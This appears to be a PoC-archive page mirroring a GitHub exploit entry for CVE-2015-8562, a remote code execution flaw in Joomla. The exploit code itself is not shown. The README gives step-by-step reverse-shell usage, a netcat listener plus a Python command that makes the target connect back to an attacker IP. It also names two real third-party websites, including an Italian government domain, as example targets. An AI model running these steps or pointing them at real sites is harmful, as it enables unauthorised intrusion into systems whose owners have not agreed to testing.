Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-8562 PoC — Joomla! Core 远程代码执行漏洞

Source
https://github.com/paralelo14/CVE-2015-8562
Associated Vulnerability
Title:Joomla! Core 远程代码执行漏洞 (CVE-2015-8562)
Description:Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
Description
Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
Readme
# CVE-2015-8562 - Reverse shell python

Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header:

    Vuln Date: 12/17/2015
    Exploit Author: anarc0der
    Version: Joomla 1.5 to 3.4.5
    CVE : CVE-2015-8562

How to:
    
    Open one terminal and listen with nc: $ nc -lnvp 4444
    Open another terminal and execute the exploit:
    python3 rce.py --target='target' --ip='ip' --port=4444
    
Targets examples PoC (Do not fuck them, to other people use as exemple):
    
    http://www.monitoraggiograduatorie.gov.it/
    http://budo-aykac.nl/
File Snapshot

 [4.0K]  /data/pocs/9d627158e879b935a85858079b5da6cc81575bc4
├── [6.3K]  rce.py
└── [ 565]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →